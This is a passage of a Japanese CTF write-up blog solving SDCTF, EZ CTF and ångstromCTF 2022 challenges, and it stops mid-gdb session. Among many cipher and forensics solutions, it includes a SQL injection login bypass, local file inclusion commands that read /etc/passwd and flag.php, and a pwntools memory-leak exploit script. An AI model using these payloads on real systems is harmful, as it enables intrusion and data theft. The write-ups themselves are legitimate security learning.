+[]]+(!![]+[])[+[]]+[+!+[]]+[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]]((!![]+[])[+[]])[([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]](([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]]+![]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])()[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])+[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]])())">
Click to display the flag!</button>

</body>
</html>

この部分をHTMLファイルとしてエクスポートする。エクスポートしたHTMLファイルをブラウザで開き、[Click to display the flag!]ボタンをクリックすると、フラグが表示された。

sdctf{G3T_F*cK3d_W1r3SHaRK}

Susan Album Party (FORENSICS 100)

jpgが複数含まれているので、バイナリエディタで位置を確認しながら、抽出する。抽出した画像にフラグの断片が見つかるので、結合する。

#!/usr/bin/env python3
with open('stub', 'rb') as f:
    data = f.read()

with open('flag1.jpg', 'wb') as f:
    f.write(data[:0x232d])

with open('flag2.jpg', 'wb') as f:
    f.write(data[0x7640:0xd0f9])

with open('flag3.jpg', 'wb') as f:
    f.write(data[0xe443:0xfcad])

sdctf{FFD8_th3n_S0ME_s7uff_FFD9}

Vinegar (CRYPTO 100)

Vigenere暗号。https://www.guballa.de/vigenere-solverで復号する。

sdctf{couldntuseleetstringsinthisonesadlybutwemadeitextralongtocompensate}

Key Recovery (CRYPTO 250)

base64デコードしたバイナリから、各パラメータの位置を確認する。
https://coolaj86.com/articles/the-openssh-private-key-format/を参考にし、実験しながら整理する。

32-bit length, sshpub       :0x0197, 0x2b-0x1c1
    32-bit length, keytype  :0x07, "ssh-rsa"
    32-bit length, pub0     :0x03, 0x3a-0x3c(=0x010001=e)
    32-bit length, pub1     :0x0181, 0x41-0x1c1(=0x00e365...2f21=n)
32-bit length for rnd+prv+comment+pad : 0x580(0x1c6-0x745)
    64-bit dummy checksum?  :0xa9cc23cda9cc23cd
    32-bit length, keytype  :0x07, "ssh-rsa"
    32-bit length, pub0     :0x0181, 0x1dd-0x35d(=0x00e365...2f21=n)
    32-bit length, pub1     :0x03, 0x362-0x364(=0x010001=e)
    32-bit length, prv0     :0x0181, 0x369-0x4e9(=0x00892c...48a1=d)
    32-bit length, prv1     :0xc0, 0x4ee-0x5ad(=0x????...c519=1/p mod q)
    32-bit length, prv2     :0xc1, 0x5b2-0x672(=0x????...????=p)
    32-bit length, prv3     :0xc1, 0x677-0x737(=0x????...????=q)
    32-bit length, comment  :0x05, "SDCTF"
    padding bytes 0x010203  :0x0102030405

n, e, d がわかるので、その値からRSAキーオブジェクトを構築し、p, q, 1/p mod qを取得する。あとは再度、秘密鍵のデータに構成し直して、id_rsaを復元する。

#!/usr/bin/env python3
from base64 import *
from Crypto.PublicKey import RSA
from Crypto.Util.number import *

KEY = 'id_rsa'
COR = 'id_rsa.corrupted'

OFFSET_LENGTHS = [(454 + 808, 190), (454 + 1004, 193), (454 + 1201, 193)]

with open(COR) as pk:
    lines = list(pk)
    b64 = ''.join((line[:-1] for line in lines[1:-1]))
    bys = bytearray(b64decode(b64))

for i in range(len(OFFSET_LENGTHS)):
    s = bys[OFFSET_LENGTHS[i][0]:OFFSET_LENGTHS[i][0] + OFFSET_LENGTHS[i][1]]
    assert s == b'\x00' * len(s)

n = int(bys[0x1dd:0x35e].hex(), 16)
e = int(bys[0x362:0x365].hex(), 16)
d = int(bys[0x369:0x4ea].hex(), 16)

privkey = RSA.construct((n, e, d))
p = privkey.p
q = privkey.q
pinv = privkey.u
assert n == p * q
assert hex(pinv)[-4:] == 'c519'

bys[0x4ee:0x5ae] = long_to_bytes(pinv).rjust(0xc0, b'\x00')
bys[0x5b2:0x673] = long_to_bytes(q).rjust(0xc1, b'\x00')
bys[0x677:0x738] = long_to_bytes(p).rjust(0xc1, b'\x00')

b64 = b64encode(bytes(bys))

id_rsa = b'-----BEGIN OPENSSH PRIVATE KEY-----\n'
for i in range(0, len(b64), 70):
    id_rsa += b64[i:i+70] + b'\n'
id_rsa += b'-----END OPENSSH PRIVATE KEY-----\n'

with open(KEY, 'wb') as f:
    f.write(id_rsa)

$ sha256sum id_rsa
687a497b47a7e8e6e88cafc6181fa0b3676548b989e7bff9bc87d55d450abd51  id_rsa

sdctf{687a497b47a7e8e6e88cafc6181fa0b3676548b989e7bff9bc87d55d450abd51}

Survey (MISC 0)

アンケートに答えたら、フラグが表示された。

sdctf{Suv3y_s@ys_Gr3AT_W0rK!}

2022-05-10

EZ CTF | Beginner Friendly Writeup

CTF writeup

この大会は2022/5/7 1:00(JST)～2022/5/8 1:00(JST)に開催されました。
今回もチームで参戦。結果は3975点で731チーム中66位でした。
自分で解けた問題をWriteupとして書いておきます。

Wavie Wave (Misc 200)

Audacityで開き、スペクトログラムを見る。サンプル周波数を調整すると、フラグが読める。

CTF{KNOW_YOUR_SPECTOGRAAAAMS}

EZ-CTF{KNOW_YOUR_SPECTOGRAAAAMS}

Grandma (Misc 350)

hexdumpしたようなデータになっているが、先頭3バイトの16進数表記がXXとなっている。PNG形式のデータであることがわかっているので、89 50 4e としてPNGを復元する。

#!/usr/bin/env python3
with open('Grandma.jpg', 'rb') as f:
    data = f.read().splitlines()

png = b''
init = True
for d in data:
    h = d.split(b'  ')[1].replace(b' ', b'').decode()
    if init:
        init = False
        h = h.replace('XXXXXX', '89504e')
    png += bytes.fromhex(h)

with open('flag.png', 'wb') as f:
    f.write(png)

復元した画像にフラグが書いてあった。

EZ-CTF{W3LL_AINT_7H47COOL}

Super Secure (Web 100)

以下の情報でログインすると、フラグが表示された。

Name: ' or 1=1 -- -
Password: a

EZ-CTF{N0t_S0_S4f3_4ft3r_411}

I made a blog! (Web 150)

ブログの1つを見ようとすると、以下のURLに遷移する。

http://ez.ctf.cafe:9999/blog-posts.php?file=blog1.html

/etc/passwdを確認してみる。

$ curl http://ez.ctf.cafe:9999/blog-posts.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

確認できたが、フラグがどこにあるかわからない。http://ez.ctf.cafe:9999/robots.txtにアクセスすると、以下のように表示される。

User-agent: *
Disallow: /flag.php

$ curl http://ez.ctf.cafe:9999/blog-posts.php?file=php://filter/convert.base64-encode/resource=flag.php
PD9waHAKCWVjaG8gJ0hvdyBkbyB5b3UgZmlsdGVyIHlvdXIgY29mZmVlPyc7ICAgIAoJLy8gRVotQ1RGe0xGSV8xU18zWn0KPz4K

$ echo PD9waHAKCWVjaG8gJ0hvdyBkbyB5b3UgZmlsdGVyIHlvdXIgY29mZmVlPyc7ICAgIAoJLy8gRVotQ1RGe0xGSV8xU18zWn0KPz4K | base64 -d
<?php
	echo 'How do you filter your coffee?';    
	// EZ-CTF{LFI_1S_3Z}
?>

EZ-CTF{LFI_1S_3Z}

Race #1 (Web 200)

Discordで以下のように通知があった。

Since someone is ruining the fun for everyone and destroying Race #1 and Race #2 we have to shut them down.

どうやらWebサイトが破壊されたため、フラグを公開したとのこと。

EZ-CTF{R3C_T0_34SY_F0R_M3}

Race #2 (Web 300)

この問題もRace #1と同様。

EZ-CTF{1_4M_PR3TTY_G00D_4T_R3C}

DigitalOcean (Forensics 50)

スライド2にフラグの先頭部分が書かれている。

EZ-CTF{TH1S_

スライド5にフラグの末尾が書かれている。

1S_FR33}

EZ-CTF{TH1S_1S_FR33}

Bernie (Steganography 125)

steghideで隠しファイルを抽出する。このときパスワードは空で指定する。

$ steghide extract -sf Bernie.jpg 
Enter passphrase: 
wrote extracted data to "FlagHere.txt".

$ cat FlagHere.txt 
\28x\32x\38x\28x\32x\38x\28x\32x\38x\28x\32x\38xE\28x\32x\38x\28x\32x\38xZ\28x\32x\38x-\28x\32x\38xC\28x\32x\38x\28x\32x\38xT\28x\32x\38xF\28x\32x\38x{N\28x\32x\38xO\28x\32x\38xW\28x\32x\38x_\28x\32x\38x\28x\32x\38xY\28x\32x\38x\28x\32x\38xO\28x\32x\38xU_\28x\32x\38xS\28x\32x\38x\28x\32x\38x\28x\32x\38x\28x\32x\38xE\28x\32x\38x\28x\32x\38xE\28x\32x\38x_\28x\32x\38xM\28x\32x\38xE\28x\32x\38x\28x\32x\38x_\28x\32x\38xN\28x\32x\38xI\28x\32x\38x\28x\32x\38xC\28x\32x\38xE\28x\32x\38x}\28x\32x\38x\28x\32x\38x\28x\32x\38x\28x\32x\38x\28x\32x\38x\28x\32x\38x

16進数表記としてデコードする。

(28(28(28(28E(28(28Z(28-(28C(28(28T(28F(28{N(28O(28W(28_(28(28Y(28(28O(28U_(28S(28(28(28(28E(28(28E(28_(28M(28E(28(28_(28N(28I(28(28C(28E(28}(28(28(28(28(28(28

"(28"はゴミなので、削除する。以上をスクリプトにしたものが以下のコード。

#!/usr/bin/env python3
with open('FlagHere.txt', 'r') as f:
    data = f.read()

hex_mode = False
code = ''
msg = ''
for d in data:
    if d == '\\':
        hex_mode = True
    elif hex_mode == True and d == 'x':
        msg += chr(int(code, 16))
        hex_mode = False
        code = ''
    elif hex_mode == True:
        code += d
    else:
        msg += d

print('[+] msg:', msg)

flag = msg.replace('(28', '')
print('[*] flag:', flag)

実行結果は以下の通り。

[+] msg: (28(28(28(28E(28(28Z(28-(28C(28(28T(28F(28{N(28O(28W(28_(28(28Y(28(28O(28U_(28S(28(28(28(28E(28(28E(28_(28M(28E(28(28_(28N(28I(28(28C(28E(28}(28(28(28(28(28(28
[*] flag: EZ-CTF{NOW_YOU_SEE_ME_NICE}

EZ-CTF{NOW_YOU_SEE_ME_NICE}

Nobody's perfect (Steganography 210)

https://stylesuxx.github.io/steganography/でデコードする。デコードしたデータの中にフラグが含まれていた。

EZ-CTF{Lickilicky_Is_Th3_Worst}

More Sense (Crypto 60)

"A", "B"とスペースの暗号になっている。モールス信号と推測しデコードする。
"A"を"."、"B"を"-"に置き換え、https://www.dcode.fr/morse-codeでデコードする。

BB BBBBB ABA AAA AAABB AABBAB BABB BBBBB AAB ABA AABBAB ABB AAAAB BABB AABBAB BBBBB AAB BBAAA AABBAB BBBBB AABA AABBAB AAAA AAABB ABA AAABB
　　　　↓
-- ----- .-. ... ...-- ..--.- -.-- ----- ..- .-. ..--.- .-- ....- -.-- ..--.- ----- ..- --... ..--.- ----- ..-. ..--.- .... ...-- .-. ...--
　　　　↓
M0RS3_Y0UR_W4Y_0U7_0F_H3R3

EZ-CTF{M0RS3_Y0UR_W4Y_0U7_0F_H3R3}

No Kidding (Crypto 70)

ガラケーのキーパッドのキー入力と推測してデコードする。

8/44/444/7777\\\444/7777\\\8/44/33\\\555/2/6/33/7777/8\\\222/8/333\\\333/555/2/4\\\33/888/33/33/33/33/777
T H  I   S   _  I   S   _  T H  E _  L   A M E  S    T_  C   T F  _  F   L   A G_  E  V   E  E  E  E  R

EZ-CTF{THIS_IS_THE_LAMEST_CTF_FLAG_EVEEEER}

OMG (Crypto 80)

テキストエディタで開くとASCIIアートのように文字が見える。

1_HAT3_TH15_FL4G

EZ-CTF{1_HAT3_TH15_FL4G}

Slow Slow Slow (Crypto 240)

base64文字列になっているが、デコードしても、手掛かりはない。問題文にreverseという単語が使われていることから、バイト列を逆にすることを組み合わせて復号する。

#!/usr/bin/env python3
from base64 import *

with open('Slow Slow Slow.txt', 'r') as f:
    data = f.read()

data = data[::-1]

for _ in range(5):
    data = b64decode(data)

data = data[::-1]

with open('flag.jpg', 'wb') as f:
    f.write(data)

結果、逆順→base64デコード5回→逆順でjpgになり、画像にフラグが書いてあった。

EZ-CTF{SL0WP0K3_1NC3PT10N}

Gift Wrapped (Crypto 380)

hexdumpしたようなデータになっているので、デコードする。デコードしたデータをASCIIコードの連結したものと推測して、デコードする。

te tetted e tettetett tettet te tettetett tettek tettese - 105 132 55 103 124 106 173 127 63 61 162 144 137 174 55 174 165 156 147 64 162 61 141 156 137 124 60 156 147 165 63 137 124 167 61 163 164 63 162 175

ハイフンの後ろを8進数表記のASCIIコードとしてデコードする。

#!/usr/bin/env python3
with open('Gift Wrapped.txt', 'rb') as f:
    data = f.read().splitlines()

codes = b''
for d in data:
    h = d.split(b'  ')[1].replace(b' ', b'').decode()
    codes += bytes.fromhex(h)
codes = codes.decode()

msg = ''
code = ''
for c in codes:
    code += c
    if int(code) > 31 and int(code) < 127:
        msg += chr(int(code))
        code = ''

print('[+] message:', msg)

enc = msg.split(' - ')[1]
enc = enc.split(' ')
flag = ''
for c in enc:
    flag += chr(int(c, 8))
print('[*] flag:', flag)

実行結果は以下の通り。

[+] message: te tetted e tettetett tettet te tettetett tettek tettese - 105 132 55 103 124 106 173 127 63 61 162 144 137 174 55 174 165 156 147 64 162 61 141 156 137 124 60 156 147 165 63 137 124 167 61 163 164 63 162 175
[*] flag: EZ-CTF{W31rd_|-|ung4r1an_T0ngu3_Tw1st3r}

EZ-CTF{W31rd_|-|ung4r1an_T0ngu3_Tw1st3r}

Qweauty and the Beast (Crypto 470)

8進数表記のASCIIコードとしてデコードする。さらに後ろの文字列と逆順にする。

#!/usr/bin/env python3
enc = '124 150 151 163 40 151 163 40 144 145 146 151 156 151 164 145 154 171 40 141 40 146 154 141 147 40 175 163 73 144 106 137 156 166 141 145 126 137 60 106 137 163 150 141 122 137 150 152 64 64 64 103 137 153 145 101 137 153 145 63 144 106 173 125 106 126 55 132 113'

enc = enc.split(' ')
msg = ''
for c in enc:
    msg += chr(int(c, 8))
print(msg)

enc = msg.split('flag ')[1][::-1]
print(enc)

実行結果は以下の通り。

This is definitely a flag }s;dF_nvaeV_0F_shaR_hj444C_keA_ke3dF{UFV-ZK
KZ-VFU{Fd3ek_Aek_C444jh_Rahs_F0_Veavn_Fd;s}

問題タイトルから考えると、キーボードのキー配列が関係していそう。https://en.wikipedia.org/wiki/Keyboard_layoutを参考にして考える。
QWERTY配列とWorkman配列の対応表は以下のようになる。

QWERTY  QWERTYUIOPpASDFGHJKL+;ZXCVBNM
Workman QDRWBJFUP:;ASHTGYNEOIiZXMCVKL

このことを元にWorkman配列のものに変換する。

EZ-CTF{Th3re_Are_M444ny_Ways_T0_Crack_This}

Too Many Colors (Crypto 490)

hexahue。https://www.dcode.fr/hexahue-cipherでデコードする。ただし、そのままだと該当する文字がないので、180度回転させてデコードする。

KC4LBT1TN14PU0YN4C7VB3RUS

デコードした文字列を逆順にする。

SUR3BV7C4NY0UP41NT1TBL4CK

EZ-CTF{SUR3_BV7_C4N_Y0U_P41NT_1T_BL4CK}

2022-05-09

ångstromCTF 2022 Writeup

CTF writeup

この大会は2022/4/30 9:00(JST)～2022/5/5 9:00(JST)に開催されました。
今回もチームで参戦。結果は1091点で1180チーム中206位でした。
自分で解けた問題をWriteupとして書いておきます。

Sanity Check (MISC 10)

Discordに入り、#rolesチャネルのメッセージにフラグアイコンでリアクションすると、たくさんのチャネルが現れる。#generalチャネルのトピックを見ると、フラグが書いてあった。

actf{sice_deets_and_capture_flags}

Interwebz (MISC 20)

ncで接続するだけ。

$ nc challs.actf.co 31335
actf{plugged_in_and_ready_to_go}

Confetti (MISC 40)

$ binwalk confetti.png 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 3971 x 2918, 8-bit/color RGBA, non-interlaced
115           0x73            Zlib compressed data, default compression
967339        0xEC2AB         PNG image, 3971 x 2918, 8-bit/color RGBA, non-interlaced
967454        0xEC31E         Zlib compressed data, default compression
1934678       0x1D8556        PNG image, 3971 x 2918, 8-bit/color RGBA, non-interlaced
1934732       0x1D858C        TIFF image data, big-endian, offset of first image directory: 8
1935040       0x1D86C0        Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#">
3180408       0x308778        PNG image, 3971 x 2918, 8-bit/color RGBA, non-interlaced
3180523       0x3087EB        Zlib compressed data, default compression

pngが複数含まれている。4つのpngを抽出し、それぞれStegsolveで開いてみる。3つ目のpngのAlpha plane 7でフラグを確認することができた。

actf{confetti_4_u}

amongus (MISC 40)

$ tar -zxf amongus.tar.gz
$ cd out
$ md5sum * > hash.txt
$ cat hash.txt
56f9fc5e1e5e02492fb9d5e7b8dbe13b  actf{look1ng_f0r_answers_in_the_p0uring_r4in_001a5e03f1d9}.txt
56f9fc5e1e5e02492fb9d5e7b8dbe13b  actf{look1ng_f0r_answers_in_the_p0uring_r4in_007ede72ab2d}.txt
56f9fc5e1e5e02492fb9d5e7b8dbe13b  actf{look1ng_f0r_answers_in_the_p0uring_r4in_00965747d583}.txt
        :
56f9fc5e1e5e02492fb9d5e7b8dbe13b  actf{look1ng_f0r_answers_in_the_p0uring_r4in_b205645b3ad8}.txt
668cb9edd4cd2c7f5f66bee312bd1988  actf{look1ng_f0r_answers_in_the_p0uring_r4in_b21f9732f829}.txt
56f9fc5e1e5e02492fb9d5e7b8dbe13b  actf{look1ng_f0r_answers_in_the_p0uring_r4in_b28d14a08b47}.txt
        :
56f9fc5e1e5e02492fb9d5e7b8dbe13b  actf{look1ng_f0r_answers_in_the_p0uring_r4in_ff9a5edd134a}.txt
56f9fc5e1e5e02492fb9d5e7b8dbe13b  actf{look1ng_f0r_answers_in_the_p0uring_r4in_fff81cb463ea}.txt
56f9fc5e1e5e02492fb9d5e7b8dbe13b  actf{look1ng_f0r_answers_in_the_p0uring_r4in_fff9bb3b7940}.txt

1つだけmd5の値が異なるものがある。

actf{look1ng_f0r_answers_in_the_p0uring_r4in_b21f9732f829}

Shark 1 (MISC 70)

TCPパケットでTCP Streamを見る。

Hello!
Here is the flag:
actf{wireshark_doo_doo_doo_doo_doo_doo}

actf{wireshark_doo_doo_doo_doo_doo_doo}

Shark 2 (MISC 70)

パケットNo.38にjpgが含まれているのがわかる。
以下でフィルタリングし、分断されたjpgをエクスポートする。

tcp.stream eq 2 && ip.dst==10.0.2.15

エクスポートしたファイルを結合する。

$ cat *.bin > flag.jpg

結合した画像にフラグが書いてあった。

actf{i_see_you}

whatsmyname (PWN 50)

yourNameで48バイトを入力して、myNameをリークして、guessにこの値を入力すればよい。100%ではないが、何回か実行すると成功する。

#!/usr/bin/env python3
from pwn import *

if len(sys.argv) == 1:
    p = remote('challs.actf.co', 31223)
else:
    p = process('./whatsmyname')

BUFLEN = 48
payload = 'A' * BUFLEN

data = p.recvuntil(b'? ').decode()
print(data + payload)
p.sendline(payload.encode())
data = p.recvuntil(b'!\n').rstrip()
print(data)
myName = data[len('Nice to meet you, ') + BUFLEN:-1]

data = p.recvuntil(b'!\n').rstrip().decode()
print(data)
print(myName)
p.sendline(myName)
data = p.recvuntil(b'\n').rstrip().decode()
print(data)

実行結果は以下の通り。

[+] Opening connection to challs.actf.co on port 31223: Done
Hi! What's your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
b'Nice to meet you, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x92!\xd9\x08\xea])&?]:\xceQA6\xd9\xff\x84\xd9\xde\xcb\xb2\xc3^\xc8]\xb1\xb2aGj\xf1\x01\x8f\xdc#\x06\xfb\x97\xb8\xba\xe0O\xe2\xc6\x10^!'
Guess my name and you'll get a flag!
b'\x92!\xd9\x08\xea])&?]:\xceQA6\xd9\xff\x84\xd9\xde\xcb\xb2\xc3^\xc8]\xb1\xb2aGj\xf1\x01\x8f\xdc#\x06\xfb\x97\xb8\xba\xe0O\xe2\xc6\x10^'
actf{i_c0uld_be_l0nely_with_y0u_a21f8611c74b}
[*] Closed connection to challs.actf.co port 31223

actf{i_c0uld_be_l0nely_with_y0u_a21f8611c74b}

wah (PWN 100)

$ file wah
wah: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e949b6182d3dd788fe7b74c45855517dbd5e60ef, for GNU/Linux 3.2.0, not stripped

$ checksec.sh --file wah
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    Not an ELF file   No RPATH   No RUNPATH   wah

BOFでflag関数をコールする。

$ gdb -q ./wah
Reading symbols from ./wah...(no debugging symbols found)...done.
gdb-peda$ pattc 64
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'
gdb-peda$ r
Starting program: /mnt/hgfs/Shared/wah 
Cry: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH

Program received signal SIGSEGV, Segmentation fault.

